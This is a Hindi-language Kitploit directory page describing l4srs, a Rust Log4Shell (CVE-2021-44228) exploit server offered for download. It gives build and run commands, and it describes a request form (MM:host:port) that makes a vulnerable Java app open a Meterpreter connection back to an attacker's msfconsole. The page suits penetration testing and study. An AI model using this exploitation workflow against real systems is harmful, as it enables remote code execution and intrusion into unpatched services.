Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
l4srs — Log 4 Shell (log 4 j - CVE-2021-44228) का Rust कार्यान्वयन | Kitploit
उपकरण/GitHubGitHub/s-retlaw/l4srs
पेलोड जनरेशनभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubs-retlaw/l4srs

l4srs

Log 4 Shell (log 4 j - CVE-2021-44228) का Rust कार्यान्वयन

रिपॉजिटरी देखें
3 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

l4srs

Log 4 Shell (log4j - CVE-2021-44228) का Rust कार्यान्वयन

निर्माण के लिए cargo +nightly build चलाएँ

यह संस्करण आपको कमांड क्लासेज़ बनाने, एक मिनी मीटरप्रेटर को गतिशील रूप से सेवा प्रदान करने की अनुमति देता है जो शोषित Java ऐप के एक थ्रेड में चलता है, और LDAP और HTTP सर्वर चलाता है। यह संस्करण LDAP और HTTP अनुरोधों को एक ही पोर्ट पर सेवा प्रदान करता है।

आप एक साथ कई पोर्ट पर चल सकते हैं ताकि यह देख सकें कि लक्ष्य मशीन के लिए कौन से पोर्ट आउटगोइंग के लिए उपलब्ध हो सकते हैं।

यदि अनुरोध LDAP या HTTP नहीं है, तो यह अनुरोध को उसी पोर्ट पर किसी अन्य मशीन पर प्रॉक्सी कर सकता है। यदि लक्ष्य मशीन में केवल एक आउटगोइंग पोर्ट है, तो आप LDAP, HTTP की सेवा कर सकते हैं और उसी पोर्ट का उपयोग मीटरप्रेटर कनेक्शन को किसी अन्य स्थानीय पोर्ट या किसी अन्य मशीन पर प्रॉक्सी करने के लिए कर सकते हैं।

इस संस्करण में अब javac को स्थापित करने की आवश्यकता नहीं है। यह अभी भी गतिशील "क्लास बिल्डिंग" की अनुमति देता है, लेकिन ऐसा निष्पादन योग्य में एम्बेडेड प्रीकंपाइल्ड क्लासेज़ को बदलकर करता है।

यह संस्करण nmap द्वारा परिभाषित शीर्ष 100 और शीर्ष 1000 पोर्ट जोड़ता है। --pC100 या --pC1000 विकल्पों का उपयोग करें।

सामान्य उपयोग का मामला कमांड क्लास(ज़) बनाना और फिर सर्वर चलाना है। l4srs build -c Cmd1 -l firefox -w Calc.exe l4srs build -c TouchMe -l "touch /tmp/me"

तब आप Cmd1 का अनुरोध कर सकते हैं और यह Linux पर firefox और Windows पर Calc लॉन्च करेगा। यदि आप TouchMe का अनुरोध करते हैं, तो यह Linux पर /tmp/me को टच करेगा और Windows पर कुछ भी निष्पादित नहीं करेगा।

फिर आप l4srs run --pC100 चला सकते हैं ताकि शीर्ष 100 पोर्ट पर सर्वर शुरू हो और Cmd1 या TouchMe की सेवा दे सके।

इसके अतिरिक्त, यदि आप MM:Host:port का अनुरोध करते हैं, तो यह गतिशील रूप से एक मिनी मीटरप्रेटर क्लास बनाएगा जो अनुरोध में निर्दिष्ट होस्ट और पोर्ट तक पहुंचेगा। यदि आपका msfconsole 10.20.30.40 पर पोर्ट 4444 पर चल रहा है, तो आप MM:10.20.30.40:4444 का अनुरोध करेंगे; यह बिल्ड कमांड के साथ नहीं बनाया गया है, बल्कि अनुरोध पर गतिशील रूप से बनाया गया है।

यह संस्करण मेमोरी कैश से क्लासेज़ के निर्माण और सेवा की अनुमति देता है। सभी गतिशील MiniMeterpreter क्लासेज़ अब फ़ाइल सिस्टम को स्पर्श नहीं करते हैं। इसके अतिरिक्त, 2 नए फ़्लैग जोड़े गए हैं। पहला --no_fs है जो यह सुनिश्चित करेगा कि हम फ़ाइल सिस्टम से कभी कोई फ़ाइल सेवा न करें। दूसरा --allow_cmd है जो किसी भी खुले पोर्ट से /build_cmd पर POST अनुरोध के साथ और फ़ील्ड्स के साथ json बॉडी भेजकर गतिशील क्लास निर्माण को सक्षम करेगा: class_name, l_cmd, w_cmd

टूल डाउनलोड करें